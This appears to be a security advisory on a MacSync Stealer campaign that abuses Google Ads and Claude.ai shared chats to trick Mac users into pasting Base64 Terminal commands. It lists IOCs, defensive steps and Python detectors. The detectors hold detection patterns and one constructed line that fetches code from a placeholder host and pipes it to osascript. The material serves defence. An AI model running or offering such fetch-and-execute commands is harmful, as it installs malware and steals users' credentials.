Russian-speaking threat actors are running an active malvertising campaign that weaponises Google Ads and Anthropic's Claude.ai shared-chat feature to deliver MacSync Stealer — an information-stealing malware targeting macOS users — through a social-engineering technique known as ClickFix. Searchers who look up "Claude mac download" are served sponsored results that display the legitimate claude.ai domain but redirect to attacker-controlled pages embedding malicious installation instructions inside fabricated AI conversations. More than 200 malicious ads are in circulation; at least 15,600 users viewed the rogue Claude artifacts before discovery.
MacSync Stealer and ClickFix: Technical Details
MacSync Stealer is a member of the Atomic macOS Stealer (AMOS) family, a prolific ecosystem of macOS infostealers-as-a-service that has evolved continuously since at least April 2023. AMOS variants — including Banshee, Poseidon, RodrigoStealer, and now MacSync — share code lineage and are rented to criminal operators on underground Telegram channels for approximately $1,000 per month. The MacSync variant is operated by a threat actor using the alias mentalpositive on Russian-language forums.
The delivery mechanism is ClickFix (also written Clickfix), a social-engineering technique in which an attacker embeds a Base64-encoded shell command inside a web page and instructs the victim to open Terminal and paste it manually. The phrase "ClickFix" refers to the lure narrative — typically a fake error message or setup guide claiming the user must "fix" a problem by running the provided command. By moving execution into the user's own Terminal session, the attack bypasses browser-level sandbox controls and many endpoint-detection heuristics that look for processes spawned by browser renderers.
The attack chain unfolds in five steps:
- Google Ad. The attacker purchases sponsored search placements targeting queries like "Claude mac download". The ad displays claude.ai as the visible destination URL, passing Google's domain-match check, but the landing page is attacker-controlled.
- Fake Claude.ai shared chat. The page redirects to — or embeds — a Claude.ai shared-conversation URL (claude.ai/share/...) crafted to resemble an Apple Support installation guide. Two confirmed malicious share URLs are claude.ai/share/9aac1046-a39e-4618-8265-f54c4be863f7 and claude.ai/share/eb2db455-1d47-4baf-8671-0a689e165902. Anthropic's platform allows any user to publish a conversation as a publicly viewable link — a legitimate collaboration feature that the attackers exploit as a free, trusted-domain hosting vector.
- ClickFix prompt. The chat instructs the victim to open macOS Terminal and paste a Base64-encoded command presented as a required installation step.
- In-memory payload execution. Decoding the Base64 string yields a shell script that downloads and executes the MacSync Stealer payload via osascript (AppleScript, Apple's built-in scripting engine). The payload runs entirely in memory with minimal disk artifacts, reducing the window for antivirus detection.
- Data exfiltration. Collected data is shipped to one of several command-and-control (C2) domains over HTTPS POST requests.
Security engineer Berk Albayrak at Trendyol Group is credited with initial discovery of the Claude variant. Earlier iterations of the same campaign used ChatGPT and Grok artifacts; the pivot to Claude.ai occurred in February 2026.
What MacSync Stealer Collects
Once active, MacSync Stealer harvests a broad range of sensitive data from the infected Mac:
- Browser credentials and cookies from Chrome, Safari, Firefox, Brave, and Chromium-based browsers
- macOS Keychain contents — the system-wide password vault storing Wi-Fi keys, app passwords, and private certificates
- Cryptocurrency wallets — wallet.dat files and seed phrases from common software wallets
- Telegram session files, enabling account takeover without the victim's password
- macOS Notes — the built-in notes application, which users frequently use to store sensitive information
- Documents matching common file extensions from the Desktop and Downloads folders
All collection is performed in-memory where possible, with only transient ZIP archives written to /tmp before transmission.
Exploitation Status and Threat Landscape
The campaign is actively running as of May 10, 2026. Key threat-landscape indicators:
- 200+ malicious Google Ads were confirmed active, spoofing brands including 7-Zip, LibreOffice, Notepad++, Final Cut Pro, Homebrew, and Anthropic's Claude — all common software titles that Mac users actively search for.
- 35+ hijacked Google Ads accounts are being used to distribute the ads, making takedown difficult because the accounts belong to legitimate advertisers.
- 15,600+ views of the rogue Claude.ai shared artifacts were recorded before reporting.
- MacSync Stealer is sold as Malware-as-a-Service (MaaS) on Telegram, meaning multiple operators can run simultaneous campaigns using the same payload.
- The campaign has been flagged by Sophos, SentinelOne, Huntress, Microsoft Security, and CloudSEK.
- The U.S. Center for Internet Security (CIS) issued a dedicated advisory noting MacSync campaigns are impacting U.S. State, Local, Tribal, and Territorial (SLTT) government macOS users.
No CVE identifier has been issued for this campaign because it relies entirely on social engineering rather than a software vulnerability.
Who Is Affected
Any macOS user — regardless of version — who searches for popular software on Google and interacts with a sponsored search result is at risk. The campaign specifically targets:
- Individual Mac users searching for Claude, 7-Zip, LibreOffice, Homebrew, or Final Cut Pro
- Developers and engineers who commonly use Homebrew and command-line tooling — and are therefore more likely to trust and execute a Terminal command from a plausible-looking guide
- U.S. government and public-sector organisations running macOS endpoints
- Cryptocurrency holders — wallet data is a primary collection target
The malware does not exploit a kernel or application vulnerability; it runs entirely within the user's own privilege context. No macOS version, SIP (System Integrity Protection) status, or patch level provides automatic immunity.
What You Should Do Right Now
- Never paste Terminal commands from a web page or chat. Legitimate software does not require you to open Terminal and manually execute commands during installation. If an "installation guide" asks you to do so, treat it as an attack.
- Verify downloads from official sources only. For Claude, the official download is at claude.ai/download. For any software, navigate directly to the vendor's domain — do not click sponsored Google results.
- Audit recently opened Terminal sessions. If you believe you may have executed a pasted command, review your shell history (cat ~/.zsh_history | tail -100) for unfamiliar Base64 strings or curl | bash patterns.
- Check for suspicious outbound connections. Look for POST traffic to any of the known C2 domains: mansfieldpediatrics[.]com, gatemaden[.]space, focusgroovy[.]com, a2abotnet[.]com, bernasibutuwqu2[.]com. Use lsof -i or your endpoint security console.
- Rotate credentials immediately if you suspect compromise — prioritise browser-stored passwords, macOS Keychain-managed accounts, and any cryptocurrency seed phrases. Enable MFA on all accounts that support it.
- Deploy endpoint detection. Security vendors including Malwarebytes for Mac, SentinelOne, and Sophos have updated signatures for MacSync Stealer. Run a full scan and verify your EDR (Endpoint Detection and Response — software that continuously monitors and records system activity) telemetry for osascript invocations spawned by user shell sessions.
# Check shell history for base64-encoded payloads (zsh)
grep -E 'base64|osascript|curl.*sh|bash.*<\(' ~/.zsh_history | tail -50
# List processes with open network connections
lsof -i -nP | grep ESTABLISHED
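As an added example (not code from the original advisory), the following Python goes one step further than the grep above: it decodes the long Base64 runs it finds in each ~/.zsh_history line and matches the decoded script against the indicators this page lists. The sample history, the .invalid placeholder host and the function names are constructed for the demo.

```python
"""Triage zsh history for ClickFix-style pasted Base64 commands. Added example, not
code from the advisory: decodes long Base64 runs in each history line and flags decoded
content that looks like a stage-1 downloader, names a page C2 domain, or carries the
hardcoded campaign API key. All sample data below is constructed."""
import base64
import re

# Defanged C2 domains from the advisory, re-fanged for substring matching.
C2_DOMAINS = [d.replace("[.]", ".") for d in ("mansfieldpediatrics[.]com", "gatemaden[.]space",
              "focusgroovy[.]com", "a2abotnet[.]com", "bernasibutuwqu2[.]com")]
CAMPAIGN_KEY = "5190ef1733183a0dc63fb623357f56d6"  # campaign fingerprint from the page
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # only long base64 runs
STAGE1_HINTS = re.compile(r"\b(curl|wget|osascript|bash|sh)\b")
ZSH_EXT = re.compile(r"^: \d+:\d+;(.*)$")  # zsh EXTENDED_HISTORY prefix

def command_of(line):
    """Strip the zsh ': timestamp:duration;' prefix if present."""
    m = ZSH_EXT.match(line)
    return m.group(1) if m else line

def decode_blobs(cmd):
    """Decode every long base64 run in a command, skipping runs that are not valid base64."""
    out = []
    for blob in B64_BLOB.findall(cmd):
        try:  # binascii.Error (bad padding/alphabet) is a ValueError subclass
            out.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:
            pass
    return out

def triage_history(lines):
    """Return [{'line', 'reasons', 'decoded'}] for lines whose decoded blob matches."""
    findings = []
    for n, raw in enumerate(lines, 1):
        for decoded in decode_blobs(command_of(raw.rstrip("\n"))):
            reasons = []
            if STAGE1_HINTS.search(decoded):
                reasons.append("stage-1 downloader keywords")
            if any(d in decoded for d in C2_DOMAINS):
                reasons.append("known C2 domain")
            if CAMPAIGN_KEY in decoded:
                reasons.append("campaign API key")
            if reasons:
                findings.append({"line": n, "reasons": reasons, "decoded": decoded})
    return findings

def fake_paste_line(script, ts=1715300200):
    """Constructed history line shaped like a ClickFix paste, for exercising the detector."""
    return f": {ts}:0;echo {base64.b64encode(script.encode()).decode()} | base64 -d | bash"

# Constructed sample: a normal command and a paste whose decoded script points at a .invalid host.
_PAYLOAD = "curl -fsSL 'https://stage-placeholder.invalid/p?k=" + CAMPAIGN_KEY + "' | osascript"
SAMPLE_HISTORY = [": 1715300000:0;brew install libreoffice", fake_paste_line(_PAYLOAD)]
```

To run it over a real file, pass `open(os.path.expanduser("~/.zsh_history"), errors="replace")` to `triage_history`.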
Background: Understanding the Risk
This campaign highlights two compounding trust problems that make macOS users particularly vulnerable right now.
Shared AI chat URLs as an attack surface. Platforms like Claude.ai, ChatGPT, and Grok allow users to publish conversations as permanent, publicly accessible URLs. This is a valuable collaboration feature — but it also means an attacker can author any content they want (including convincing fake "Apple Support" guides), publish it at a trusted first-party domain (claude.ai), and link to it from a malicious ad. Browser security indicators — the padlock, the green URL bar — show claude.ai as legitimate because the domain is legitimate. The malicious content lives inside the page, not in the domain.
ClickFix is a growing attack class, not a one-off. The technique was documented extensively in 2025 across Windows campaigns (fake CAPTCHA pages instructing users to press Win+R and paste a PowerShell payload). Attackers are now applying the same template to macOS, replacing PowerShell with Terminal and osascript. Because the command runs in the user's own session — not spawned by a browser subprocess — many EDR rules that monitor for browser-child-process execution do not fire. The shift to in-memory execution via osascript further reduces forensic visibility.
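Added example, not from the advisory: a process-ancestry check that flags osascript launched under an interactive shell inside a terminal app, which is the execution path the browser-child-process rules described above do not cover. The ps output is a constructed sample and the function names are mine; it assumes macOS ps, whose comm column shows full paths and login shells as -zsh.

```python
"""Flag osascript processes whose ancestry runs through an interactive shell under a
terminal app. Added example, not from the advisory: parses `ps -axo pid,ppid,comm`
output (constructed sample below) rather than relying on browser-child-process rules."""
import re

SHELLS = {"zsh", "-zsh", "bash", "-bash", "sh", "-sh"}
TERMINALS = {"Terminal", "iTerm2"}
PS_LINE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(.+?)\s*$")

def parse_ps(text):
    """Return {pid: (ppid, basename of comm)} from `ps -axo pid,ppid,comm` output."""
    procs = {}
    for line in text.splitlines()[1:]:  # first line is the PID/PPID/COMM header
        m = PS_LINE.match(line)
        if m:
            procs[int(m.group(1))] = (int(m.group(2)), m.group(3).rsplit("/", 1)[-1])
    return procs

def ancestry(procs, pid):
    """Command names from pid up to the root, guarding against ppid cycles."""
    chain, seen = [], set()
    while pid in procs and pid not in seen:
        seen.add(pid)
        ppid, comm = procs[pid]
        chain.append(comm)
        pid = ppid
    return chain

def shell_spawned_osascript(procs):
    """Return [(pid, 'osascript <- shell <- ...')] for osascript under a terminal shell."""
    hits = []
    for pid, (_, comm) in procs.items():
        if comm != "osascript":
            continue
        chain = ancestry(procs, pid)
        ancestors = chain[1:]
        if any(c in SHELLS for c in ancestors) and any(c in TERMINALS for c in ancestors):
            hits.append((pid, " <- ".join(chain)))
    return hits

# Constructed ps output: a Terminal -> zsh -> osascript chain next to a browser-spawned one.
SAMPLE_PS = """\
  PID  PPID COMM
    1     0 /sbin/launchd
  410     1 /System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal
  412   410 -zsh
  530   412 /usr/bin/osascript
  600     1 /Applications/Google Chrome.app/Contents/MacOS/Google Chrome
  640   600 /usr/bin/osascript
"""
```

On a live Mac, feed `subprocess.run(["ps", "-axo", "pid,ppid,comm"], capture_output=True, text=True).stdout` to `parse_ps`; the browser-spawned osascript in the sample is deliberately left to the existing browser-child rules.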
The AMOS ecosystem demonstrates that macOS malware has matured into a professional MaaS industry. Earlier threat models that treated macOS as inherently safer than Windows due to lower market share are increasingly outdated — macOS is disproportionately common among developers, finance professionals, and executives, making its users high-value targets even at lower absolute volume.
Indicators of Compromise
Malicious Claude.ai shared chat URLs:
- https://claude.ai/share/9aac1046-a39e-4618-8265-f54c4be863f7
- https://claude.ai/share/eb2db455-1d47-4baf-8671-0a689e165902
C2 domains (defanged):
- mansfieldpediatrics[.]com
- houstongaragedoorinstallers[.]com
- gatemaden[.]space
- focusgroovy[.]com
- securityfenceandwelding[.]com
- a2abotnet[.]com
- customroofingcontractors[.]com
- bernasibutuwqu2[.]com
- briskinternet[.]com
File hashes (MD5):
- 73600d113646a95d2e459dd940c18e1e — initial shell script
- 74e17b926dc6cc5ab247aa0e059916c1 — Base64 decode script
- 4aab18983ab8c00f3c619b75033ce548 — MacSync Stealer binary
Campaign fingerprint:
- API key 5190ef1733183a0dc63fb623357f56d6 is hardcoded in the payload; its presence in network traffic or memory confirms this campaign.
Conclusion
MacSync Stealer's Google Ads and Claude.ai campaign is active, technically polished, and specifically engineered to target users who are most likely to follow technical instructions without suspicion. The single most important action for macOS users and IT teams is to enforce a hard rule: no legitimate installation ever requires pasting a command into Terminal. Treat any such instruction — regardless of how professional the surrounding page looks, and regardless of whether it appears on a trusted domain — as a red flag and report it.
For any query contact us at contact@cipherssecurity.com

